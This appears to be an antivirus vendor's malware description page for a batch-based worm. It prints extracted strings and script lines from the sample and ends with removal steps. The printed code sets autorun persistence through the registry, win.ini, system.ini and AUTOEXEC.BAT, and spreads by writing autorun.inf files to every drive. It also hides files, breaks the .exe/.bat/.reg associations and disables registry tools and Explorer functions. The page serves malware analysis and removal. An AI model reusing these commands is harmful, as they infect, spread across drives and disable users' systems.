echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf  r  s  h >>d:\setup.bat
attrib d:\setup.bat  r  s  h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat  r  s  h%
attrib %systemroot%/windows.bat  r  s  h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat  r  s  h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf  r  s  h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf  r  s  h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat  r  s  h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat  r  s  h >nul
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
goto 22c:\slears.bat
.slear
d:\sleartest.exe
adm-music.com
O%u,%
J÷%
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
c:\windows\system32\
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
VVV.dywt.com.cn
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
GetKeyState
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
CreateDialogIndirectParamA
UnhookWindowsHookEx
.text
`.rdata
@.data
.rsrc
(*.*)


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    net.exe:1364
    net.exe:1772
    net1.exe:1316
    net1.exe:644

  2. Delete the original Generic file.
  3. Delete or disinfect the following files created/modified by the Generic:

    C:\slear.bat (50 bytes)
    %System%\slear.exe (1425 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "slear.exe" = "c:\windows\system32\slear.exe"

  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now